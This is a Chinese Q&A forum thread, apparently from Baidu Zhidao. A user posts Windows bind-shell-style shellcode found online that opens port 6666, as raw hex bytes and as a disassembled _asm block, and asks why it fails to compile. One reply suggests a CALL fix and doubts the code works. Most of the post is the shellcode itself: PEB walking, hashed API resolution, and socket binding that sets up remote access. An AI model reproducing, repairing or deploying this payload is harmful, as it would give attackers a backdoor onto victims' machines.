高分求助,一段汇编实现的shellcode,总出现improper operand type错误
这是网上一段开启端口的shellcode,\x59\x81\xC9\xD3\x62\x30\x20\x41\x43\x4D\x64\xE8\x00\x00\x00\x00...
这是网上一段开启端口的shellcode,
\x59\x81\xC9\xD3\x62\x30\x20\x41\x43\x4D\x64\xE8\x00\x00\x00\x00\x58\x83\xE8\x10\x99\x96\x8D\x7E\xE8\x64\x8B\x1D\x30\x00\x00\x00\x8B\x4B\x0C\x8B\x49\x1C\x8B\x09\x8B\x69\x08\x99\xB6\x03\x2B\xE2\x66\xBA\x33\x32\x52\x68\x77\x73\x32\x5F\x54\xAC\x3C\xD3\x75\x06\x95\xFF\x57\xF4\x95\x57\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\xAC\x34\x71\x2A\xD0\x3C\x71\x75\xF7\x3A\x54\x24\x1C\x75\xEA\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3B\xF7\x75\xB4\x5E\x54\x6A\x02\xAD\xFF\xD0\x88\x46\x13\x8D\x48\x30\x8B\xFC\xF3\xAB\x40\x50\x40\x50\xAD\xFF\xD0\x95\xB8\x02\xFF\x1A\x0A\x32\xE4\x50\x54\x55\xAD\xFF\xD0\x85\xC0\x74\xF8\xFE\x44\x24\x2D\x83\xEF\x6C\xAB\xAB\xAB\x58\x54\x54\x50\x50\x50\x54\x50\x50\x56\x50\xFF\x56\xE4\xFF\x56\xE8
对其进行反汇编之后,得到如下汇编代码:
#include<stdio.h>
#include<windows.h>
int main(){
_asm{
POP ECX
OR ECX,0x203062D3
INC ECX
INC EBX
DEC EBP
CALL 0x0040102C
POP EAX
SUB EAX,10
CDQ
XCHG EAX,ESI
LEA EDI,[ESI-18]
MOV EBX,DWORD PTR FS:[0x30]
MOV ECX,DWORD PTR DS:[EBX+0x0C]
MOV ECX,DWORD PTR DS:[ECX+0x1C]
MOV ECX,DWORD PTR DS:[ECX]
MOV EBP,DWORD PTR DS:[ECX+0x08]
CDQ
MOV DH,3
SUB ESP,EDX
MOV DX,0x3233
PUSH EDX
PUSH 0x5F327377
PUSH ESP
LODS BYTE PTR DS:[ESI]
CMP AL,0xD3
JNE 0x00401062
XCHG EAX,EBP
CALL DWORD PTR DS:[EDI-0x0C]
XCHG EAX,EBP
PUSH EDI
PUSHAD
MOV EAX,DWORD PTR SS:[EBP+0x3C]
MOV ECX,DWORD PTR SS:[EAX+EBP+0x78]
ADD ECX,EBP
MOV EBX,DWORD PTR DS:[ECX+0x20]
ADD EBX,EBP
XOR EDI,EDI
INC EDI
MOV ESI,DWORD PTR DS:[EDI*4+EBX]
ADD ESI,EBP
CDQ
LODS BYTE PTR DS:[ESI]
XOR AL,71
SUB DL,AL
CMP AL,71
JNE 0x0040107A
CMP DL,BYTE PTR SS:[ESP+0x1C]
JNE 00401073
MOV EBX,DWORD PTR DS:[ECX+0x24]
ADD EBX,EBP
MOV DI,WORD PTR DS:[EDI*2+EBX]
MOV EBX,DWORD PTR DS:[ECX+0x1C]
ADD EBX,EBP
ADD EBP,DWORD PTR DS:[EDI*4+EBX]
XCHG EAX,EBP
POP EDI
STOS DWORD PTR ES:[EDI]
PUSH EDI
POPAD
CMP ESI,EDI
JNE 0x00401057
POP ESI
PUSH ESP
PUSH 2
LODS DWORD PTR DS:[ESI]
CALL EAX
MOV BYTE PTR DS:[ESI+0x13],AL
LEA ECX,[EAX+0x30]
MOV EDI,ESP
REP STOS DWORD PTR ES:[EDI]
INC EAX
PUSH EAX
INC EAX
PUSH EAX
LODS DWORD PTR DS:[ESI]
CALL EAX
XCHG EAX,EBP
MOV EAX,0x0A1AFF02 //定义开启的端口,这里为6666=0A1Ah
XOR AH,AH
PUSH EAX
PUSH ESP
PUSH EBP
LODS DWORD PTR DS:[ESI]
CALL EAX
TEST EAX,EAX
JE 0x004010C5
INC BYTE PTR SS:[ESP+2D]
SUB EDI,0x6C
STOS DWORD PTR ES:[EDI]
STOS DWORD PTR ES:[EDI]
STOS DWORD PTR ES:[EDI]
POP EAX
PUSH ESP
PUSH ESP
PUSH EAX
PUSH EAX
PUSH EAX
PUSH ESP
PUSH EAX
PUSH EAX
PUSH ESI
PUSH EAX
CALL DWORD PTR DS:[ESI-0x1C]
CALL DWORD PTR DS:[ESI-0x18]
}
return 0;
}
C:\Windows\System32\1111.cpp(11) : error C2415: improper operand type
执行 cl.exe 时出错.
1111.exe - 1 error(s), 0 warning(s) 展开
\x59\x81\xC9\xD3\x62\x30\x20\x41\x43\x4D\x64\xE8\x00\x00\x00\x00\x58\x83\xE8\x10\x99\x96\x8D\x7E\xE8\x64\x8B\x1D\x30\x00\x00\x00\x8B\x4B\x0C\x8B\x49\x1C\x8B\x09\x8B\x69\x08\x99\xB6\x03\x2B\xE2\x66\xBA\x33\x32\x52\x68\x77\x73\x32\x5F\x54\xAC\x3C\xD3\x75\x06\x95\xFF\x57\xF4\x95\x57\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\xAC\x34\x71\x2A\xD0\x3C\x71\x75\xF7\x3A\x54\x24\x1C\x75\xEA\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3B\xF7\x75\xB4\x5E\x54\x6A\x02\xAD\xFF\xD0\x88\x46\x13\x8D\x48\x30\x8B\xFC\xF3\xAB\x40\x50\x40\x50\xAD\xFF\xD0\x95\xB8\x02\xFF\x1A\x0A\x32\xE4\x50\x54\x55\xAD\xFF\xD0\x85\xC0\x74\xF8\xFE\x44\x24\x2D\x83\xEF\x6C\xAB\xAB\xAB\x58\x54\x54\x50\x50\x50\x54\x50\x50\x56\x50\xFF\x56\xE4\xFF\x56\xE8
对其进行反汇编之后,得到如下汇编代码:
#include<stdio.h>
#include<windows.h>
int main(){
_asm{
POP ECX
OR ECX,0x203062D3
INC ECX
INC EBX
DEC EBP
CALL 0x0040102C
POP EAX
SUB EAX,10
CDQ
XCHG EAX,ESI
LEA EDI,[ESI-18]
MOV EBX,DWORD PTR FS:[0x30]
MOV ECX,DWORD PTR DS:[EBX+0x0C]
MOV ECX,DWORD PTR DS:[ECX+0x1C]
MOV ECX,DWORD PTR DS:[ECX]
MOV EBP,DWORD PTR DS:[ECX+0x08]
CDQ
MOV DH,3
SUB ESP,EDX
MOV DX,0x3233
PUSH EDX
PUSH 0x5F327377
PUSH ESP
LODS BYTE PTR DS:[ESI]
CMP AL,0xD3
JNE 0x00401062
XCHG EAX,EBP
CALL DWORD PTR DS:[EDI-0x0C]
XCHG EAX,EBP
PUSH EDI
PUSHAD
MOV EAX,DWORD PTR SS:[EBP+0x3C]
MOV ECX,DWORD PTR SS:[EAX+EBP+0x78]
ADD ECX,EBP
MOV EBX,DWORD PTR DS:[ECX+0x20]
ADD EBX,EBP
XOR EDI,EDI
INC EDI
MOV ESI,DWORD PTR DS:[EDI*4+EBX]
ADD ESI,EBP
CDQ
LODS BYTE PTR DS:[ESI]
XOR AL,71
SUB DL,AL
CMP AL,71
JNE 0x0040107A
CMP DL,BYTE PTR SS:[ESP+0x1C]
JNE 00401073
MOV EBX,DWORD PTR DS:[ECX+0x24]
ADD EBX,EBP
MOV DI,WORD PTR DS:[EDI*2+EBX]
MOV EBX,DWORD PTR DS:[ECX+0x1C]
ADD EBX,EBP
ADD EBP,DWORD PTR DS:[EDI*4+EBX]
XCHG EAX,EBP
POP EDI
STOS DWORD PTR ES:[EDI]
PUSH EDI
POPAD
CMP ESI,EDI
JNE 0x00401057
POP ESI
PUSH ESP
PUSH 2
LODS DWORD PTR DS:[ESI]
CALL EAX
MOV BYTE PTR DS:[ESI+0x13],AL
LEA ECX,[EAX+0x30]
MOV EDI,ESP
REP STOS DWORD PTR ES:[EDI]
INC EAX
PUSH EAX
INC EAX
PUSH EAX
LODS DWORD PTR DS:[ESI]
CALL EAX
XCHG EAX,EBP
MOV EAX,0x0A1AFF02 //定义开启的端口,这里为6666=0A1Ah
XOR AH,AH
PUSH EAX
PUSH ESP
PUSH EBP
LODS DWORD PTR DS:[ESI]
CALL EAX
TEST EAX,EAX
JE 0x004010C5
INC BYTE PTR SS:[ESP+2D]
SUB EDI,0x6C
STOS DWORD PTR ES:[EDI]
STOS DWORD PTR ES:[EDI]
STOS DWORD PTR ES:[EDI]
POP EAX
PUSH ESP
PUSH ESP
PUSH EAX
PUSH EAX
PUSH EAX
PUSH ESP
PUSH EAX
PUSH EAX
PUSH ESI
PUSH EAX
CALL DWORD PTR DS:[ESI-0x1C]
CALL DWORD PTR DS:[ESI-0x18]
}
return 0;
}
C:\Windows\System32\1111.cpp(11) : error C2415: improper operand type
执行 cl.exe 时出错.
1111.exe - 1 error(s), 0 warning(s) 展开
1个回答
展开全部
把CALL 0x0040102C改成:
mov eax, 0x0040102C
CALL dword ptr[eax]
不过我不认为这样的程序会有用。
mov eax, 0x0040102C
CALL dword ptr[eax]
不过我不认为这样的程序会有用。
更多追问追答
追问
嗯,按您的意见改了之后还是不能运行,我想应该是地址的问题吧。我现在有原版的汇编的shellcode,但不知道能否运行,您能帮我看下吗?
追答
我觉得这里面的地址,在本机上都不能用的吧。
在Win32的Flat内存模型上,ds、es、ss应该都是相等的。如果CALL dword ptr[eax]不行的话,其他的应该都不行。
反汇编的东西,我也没做过。所以爱莫能助。
本回答由提问者推荐
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
推荐律师服务:
若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询
